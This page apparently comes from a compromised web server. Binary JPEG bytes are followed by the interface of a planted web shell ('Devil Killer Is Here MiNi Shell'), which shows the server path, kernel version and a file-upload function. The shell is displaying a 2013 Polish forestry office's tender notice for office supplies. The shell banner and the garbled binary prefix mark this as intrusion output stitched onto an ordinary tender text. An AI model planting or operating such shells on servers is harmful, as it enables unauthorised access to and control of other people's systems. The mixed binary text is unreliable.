JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130614/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130614/112469-N-2013.html

<p class="kh_header"><b>Ruszów: Dostawa artykułów biurowych na potrzeby realizacji projektu LIFE11 NAT/PL/428</b><br>
<b>Numer ogłoszenia: 112469 - 2013; data zamieszczenia: 14.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Ruszów , ul. Leśna 2, 59-950 Ruszów, woj. dolnośląskie, tel. 75 7714339, faks 75 7714468.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wroclaw.lasy.gov.pl/ruszow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Skarb Państwa, Państwowe Gospodarstwo Leśne, Lasy Państwowe , Nadleśnictwo Ruszów.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych na potrzeby realizacji projektu LIFE11 NAT/PL/428.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna, według wymagań Zamawiającego, w okresie trwania umowy, dostawa artykułów biurowych wyszczególnionych poniżej:
1.Papier ksero A3 POLjet (prime) 80g/m2 500 arkuszy lub równoważny-5 ryz
2.Brulion A4/96 kartek w twardej oprawie-kratka-5 sztuk
3.Brulion A5/96 kartek w twardej oprawie-kratka-5 sztuk
4.Bloczki samoprzylepne żółte 76x76 mm/100 karteczek-12 sztuk
5 Koperta biała bez okienka C6 samoklejąca-1000 sztuk
6.Koperta biała bez okienka C5 samoklejąca -500 sztuk
7.Koperta biała bez okienka C4 samoklejąca-250 sztuk
8. Karton wysyłkowy ok. 340mmx253mmx170mm  -  3 sztuki
9. Karton wysyłkowy ok. 437mmx327mmx170mm   -  3 sztuki
10. Karton wysyłkowy ok. 437mmx327mmx300mm  -  3 sztuki
11. Segregator A4 szerokość grzbietu 75 mm (powlekany, z dźwignią z dociskiem, z wymienną     etykietą grzbietową) kolor  -  30 sztuk
12. Segregator A4 szerokość grzbietu 50 mm (powlekany, z dźwignią z dociskiem z wymienną     etykietą grzbietową) kolor  -  20 sztuk
13. Segregator A4 szerokość grzbietu 40 mm (powlekany, z dźwignią z dociskiem z wymienną     etykietą grzbietową) kolor  -  20 sztuk
14. Skoroszyt PCV A4 miękki (zapisywalny pasek grzbietowy), (kolor)  -  50 sztuk
15. Skoroszyt PCV A4 twardy (zapisywalny pasek grzbietowy), (kolor)  -  50 sztuk
16. Skoroszyt PCV A4 twardy (zapisywalny pasek grzbietowy), wpinany w segregator (kolor)  -
       50 sztuk
17. Skoroszyt PCV A4 miękki (zapisywalny pasek grzbietowy), wpinany w segregator (kolor)  -
       50 sztuk
18. Koszulka na dokumenty A4 przeźroczysta - 300 sztuk
19. Długopis - 30 sztuk
20. Cienkopis - 10 sztuk
21. Flamastry (12 kolorów)  -  2 kpl
22. Marker do płyt CD/DVD uniwersalna końcówka - 5 sztuk
23. Zakreślacz fluorescencyjny końcówka ścięta, grubość linii pisania od 1 mm do 5mm (kolor)  -     5 sztuk
24. Ołówek z gumką (HB)  -  5 sztuk
25. Linijka plastikowa przeźroczysta 30 cm  -  1 sztuka
26. Nożyczki ok. 18,5cm (ostrze tnące ze stali wysokiej jakości, uchwyt plastikowy)  - 1 sztuka
27. Dziurkacz do 25 kartek z wysuwanym ogranicznikiem  -  1 sztuka
28. Dziurkacz do 65 kartek (jednorazowo)  -  1 sztuka
29. Zszywacz do 20 kartek (24/6)  -  1 sztuk
30. Zszywki metalowe 24/6 (1000 szt.)  -  5 opakowań
31. Zszywki  metalowe 23/10 (1000 szt.)  -  1 opakowanie
32. Zszywki metalowe 23/15 (1000 szt.)  -  1 opakowanie
33. Spinacze biurowe okrągłe 33 (100 szt.)  -  5 opakowań
34. Klipy metalowe 15 mm (12 szt.)  -  2 opakowań
35. Klipy metalowe 19 mm (12 szt.)  -  2 opakowań
36. Klipy metalowe 25 mm (12 szt.)  -  2 opakowań
37. Klipy metalowe 41 mm (12 szt.)  -  2 opakowań
38. Klipy metalowe 51 mm (12 szt.)  -  2 opakowań
39. Przybornik na biurko, 8 przegródek, w tym na artykuły piszące, na karteczki, wizytówki,     spinacze itp., ok. 143mmx158mmx93mm  -  2 sztuki
40. Półka na dokumenty/szuflada plastikowa  -  3 sztuki
41. Kalkulator (14-pozycyjny wyświetlacz, podwójna pamięć, zaokrąglanie wyników, korekta     ostatniej cyfry, klawisz podwójnego zera) ok. 15 cm x20 cm  -  2 sztuk
42. Tablica korkowa na ramie drewnianej 60cmx40cm  -  1 sztuka
43. Tablica korkowa na ramie drewnianej 120cmx40cm  -  1 sztuka
44. Tablica z możliwością pisania flamastrem -  1 sztuka
45. Mazaki do pisania na tablicy wymienionej w poz. 44  -  10 sztuk
46. Gąbka do ścierana tablicy określonej w poz. 44  -  2 sztuki
47. Papier do drukarki/kserokopiarki A4, 80g/m2, 500 arkuszy, recykling  -  500 ryz
48. Toner do drukarki Xerox WorkCentre 7120 (czarny + kolor)  -  20 kpl
49. Nośnik danych DVD-R 4,7 GB  -  50 sztuk
50. Pudełko na płytę DVD-R  -  50 sztuk
Zamawiający wymaga dostawy oryginalnych tonerów producenta (nie zamienników).
Termin dostawy wynosi do 24 godzin od daty zgłoszenia telefonicznego zapotrzebowania na dany zakres artykułów będących przedmiotem zamówienia.
Zakres zamówienia obejmuje dowóz oraz rozładunek i wniesienie/doniesienie artykułów biurowych w miejsce wskazane przez Zamawiającego, zlokalizowane w budynku biuro-administracyjnych             w Ruszowie przy ul. Leśnej 2.
Dostawy mogą się odbywać w dni robocze w godzinach od godz. 7:00 do godz. 14:00.
Zamawiający zastrzega sobie prawo nie zrealizowania całego zakresu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające polegać będzie na rozszerzeniu przedmiotu zamówienia podstawowego o wartości nie większe niż 20% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.40.00-4, 30.12.51.10-5, 30.14.10.00-9, 30.19.00.00-7, 30.19.20.00-1, 30.19.70.00-6, 30.19.90.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości 500,00 zł (słownie: pięćset złotych).
2. Wadium musi zostać wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
    3) gwarancjach bankowych;
    4) gwarancjach ubezpieczeniowych;
    5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007r. Nr 42 poz. 275 ze zmianami).
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy     Zamawiającego:
    PKO BP S.A. Bolesławiec  Nr  51 1020 2137 0000 9202 0101 5841  z dopiskiem:              
     Wadium - 20/2710/2013.
5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 
6. Wadium wniesione w formie: poręczenia bankowego lub poręczenia spółdzielczej kasy    oszczędnościowo-kredytowej, gwarancji bankowej, gwarancji ubezpieczeniowej oraz w formie     poręczenia udzielonego przez podmioty, o których mowa w pkt. 3.5, należy złożyć w formie     oryginału w siedzibie Zamawiającego (sekretariat), a kopię załączyć do oferty.
7. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty     najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta     została wybrana jako najkorzystniejsza.
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci     wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu     zabezpieczenia należytego wykonania umowy.
9. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę     przed upływem terminu składania ofert.
10. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono     wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako     najkorzystniejsza. 
    Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym przez     Zamawiającego.
11. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej                                              za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
12. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została     wybrana:
   1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach        określonych w ofercie;
   2) nie wniósł wymaganego zabezpieczenia należytego wykonania przedmiotu umowy;
   3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn        leżących po stronie Wykonawcy.
13. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, który w określonym     terminie nie złożył wymaganych przez Zamawiającego oświadczeń lub dokumentów,                                  o których mowa w pkt. X Specyfikacji Istotnych Warunków Zamówienia lub pełnomocnictw,                      i w odpowiedzi na wezwanie Zamawiającego nie złoży ich w wyznaczonym terminie, chyba że     udowodni, że wynika to z przyczyn nie leżących po jego stronie.
14. W przypadku wniesienia wadium w walucie innej niż PLN, przeliczenie wartości wadium                     na PLN nastąpi wg średniego kursu NBP z dnia publikacji ogłoszenia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie    żadnych wymagań, do spełnienia których zobligowany jest Wykonawca, poza złożeniem      oświadczenia o spełnieniu warunków udziału w postępowaniu (Załącznik Nr 3 do SIWZ);Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą udokumentować,                           że wspólnie spełniają warunki udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo     zamówień publicznych oraz że nie podlegają, każdy z osobna, wykluczeniu na podstawie art. 24     ust. 1 oraz 2 ustawy Prawo zamówień publicznych.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca potwierdził wykonywanie      głównych dostaw odpowiadających przedmiotowi zamówienia w okresie ostatnich trzech lat      przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -                 w tym okresie, o minimalnej wartości netto - 20 000,00 zł (słownie: dwadzieścia tysięcy złotych     netto); Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą udokumentować,                           że wspólnie spełniają warunki udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo     zamówień publicznych oraz że nie podlegają, każdy z osobna, wykluczeniu na podstawie art. 24     ust. 1 oraz 2 ustawy Prawo zamówień publicznych.
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać                       na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania     zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru     prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest     udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji        zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych     podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich     przy wykonywaniu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których      zobligowany jest Wykonawca, poza złożeniem Oświadczenia o spełnieniu warunków udziału      w postępowaniu (Załącznik Nr 3 do SIWZ). Złożone oświadczenie jest potwierdzeniem przez      Wykonawcę posiadania lub dysponowania m. in. odpowiednim potencjałem technicznym umożliwiającym prawidłową realizację przedmiotu zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą udokumentować,  że wspólnie spełniają warunki udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo  zamówień publicznych oraz że nie podlegają, każdy z osobna, wykluczeniu na podstawie art. 24     ust. 1 oraz 2 ustawy Prawo zamówień publicznych.
 Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać  na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania     zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru     prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest     udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji        zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych     podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich     przy wykonywaniu zamówienia.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, do spełnienia których      zobligowany jest Wykonawca, poza złożeniem Oświadczenia o spełnieniu warunków udziału      w postępowaniu (Załącznik Nr 3 do SIWZ). Złożone oświadczenie jest potwierdzeniem przez      Wykonawcę posiadania lub dysponowania m. in.  osobami umożliwiającymi prawidłową realizację przedmiotu zamówienia.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą udokumentować,                           że wspólnie spełniają warunki udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo     zamówień publicznych oraz że nie podlegają, każdy z osobna, wykluczeniu na podstawie art. 24     ust. 1 oraz 2 ustawy Prawo zamówień publicznych.
 Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać                       na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania     zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru     prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest     udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji        zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych     podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich     przy wykonywaniu zamówienia.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca był     ubezpieczony w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o minimalnej wartości ubezpieczenia wynoszącej 20 000,00 zł (słownie:  dwadzieścia tysięcy złotych).
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, muszą udokumentować, sz że wspólnie spełniają warunki udziału w postępowaniu zgodnie z art. 22 ust 1 ustawy Prawo     zamówień publicznych oraz że nie podlegają, każdy z osobna, wykluczeniu na podstawie art. 24     ust. 1 oraz 2 ustawy Prawo zamówień publicznych.
 Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać                       na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania     zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru     prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest     udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji        zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych     podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich     przy wykonywaniu zamówienia.Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły  spełnia / nie spełnia na podstawie złożonych przez Wykonawców dokumentów i oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

